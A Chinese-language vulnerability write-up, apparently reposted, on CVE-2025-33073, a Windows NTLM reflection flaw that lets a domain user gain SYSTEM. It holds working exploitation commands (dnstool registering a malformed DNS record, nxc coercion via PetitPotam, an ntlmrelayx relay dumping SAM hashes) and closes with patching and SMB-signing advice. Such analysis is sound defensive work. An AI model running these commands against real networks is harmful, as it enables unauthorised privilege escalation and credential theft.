NTLM反射漏洞拿WindowsServerSYSTEM权限,CVE-2025-33073剖析

admin 2026-07-05 06:05:27 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: CVE-2025-33073是2025年6月披露的NTLM反射漏洞,CVSS评分为8.8。该漏洞源于Windows在NTLM认证中对本地连接判断逻辑存在缺陷,攻击者可通过构造特定DNS名称欺骗系统,使其误判认证为本地行为,从而绕过SMB签名等安全机制。利用该漏洞,域内普通用户可在未强制SMB签名的目标主机上触发认证反射,最终获取SYSTEM权限并实现横向移动。建议尽快部署微软2025年6月补丁并全域强制SMB签名以缓解风险。 综合评分: 95 文章分类: 漏洞分析,内网渗透,红队,安全建设,漏洞POC


cover_image

NTLM反射漏洞拿Windows Server SYSTEM权限,CVE-2025-33073剖析

原创

Janice Janice

船山信安

2026年7月2日 12:15 广东

在小说阅读器读本章

去阅读

NTLM反射漏洞 CVE-2025-33073

一、背景:沉寂多年被重新炸开

NTLM反射早在2008 年微软就用MS08-068补过一轮,后续又堆上 SMB 签名和EPA加固,好多人以为这路子早封死了。实际上2025年6月补丁日曝出的CVE-2025-33073又把它挖开了,CVSS打到 8.8,最大的原因就是域内任意一台未强制SMB签名的主机都可能遭殃。

二、Windows本地NTLM判定的逻辑缺陷

漏洞根子在Windows判断NTLM认证是否本地的那套逻辑。系统拿主机名做比对,认定目标是自身就走本地NTLM模式,跳过挑战响应直接塞令牌进内存。

研究员发现塞一段精心构造的DNS名称就能搅乱这套判断,比如通过长串 localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,Windows解析时剥离元数据只剩主机名,误判成本地连接。于是lsass.exe这种SYSTEM进程被强制向攻击者监听器做认证,令牌再经SMB反射回目标,SYSTEM权限到手。

三、低门槛、全自动化

3.1 攻击门槛

一个普通域用户账号就够用,前提是目标没开SMB签名。

3.2 利用流程

先用nxc的coerce_plus模块探一下签名状态和强制漏洞,再起ntlmrelayx监听中继,接着用dnstool注册那条畸形DNS记录,最后用PetitPotam或PrinterBug触发强制认证。

3.3 核心 POC 代码

核心POC代码长这样:

python3 dnstool.py -u 'shield.local\scarter' -p 'Passw0rd' dc4.shield.local -a add -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -d 192.168.115.178 -dns-ip 192.168.115.180

DNS记录落位后触发认证:

nxc smb 192.168.115.185 -u scarter -p Passw0rd -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

如果ntlmrelayx那边一旦认证成功,SAM哈希就会直接dump出来,后续拿本地管理员哈希就能横向全场。

GitHub上mverschu开源的CVE-2025-33073.py整合了整套流程,支持SOCKS模式和绕过SMB签名的LDAPS中继,一条命令就把DNS注册到反射提权全部涉及。

有意思的是即便开了 SMB 签名,移除数据包里的SIGN/SEAL标志后仍能从SMB中继到LDAPS,它的MIC防护也被绕了。

五、防御建议

微软补丁加强了SMB认证期间的DNS名称校验,可配置层面SMB签名没强制的环境依然大把存在。建议尽快部署2025年6月补丁并全域强制SMB签名,别留死角。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:船山信安 Janice Janice《NTLM反射漏洞拿Windows Server SYSTEM权限,CVE-2025-33073剖析》

企业安全建设之安全运营 网络安全文章

企业安全建设之安全运营

文章总结: 本文为软文广告,推广名为知树安全团队的公众号,提供免费安全资料下载链接,包括免杀课程、逆向课程、CVE漏洞POC等资源,但未提供实质性技术内容或可操
评论:0   参与:  0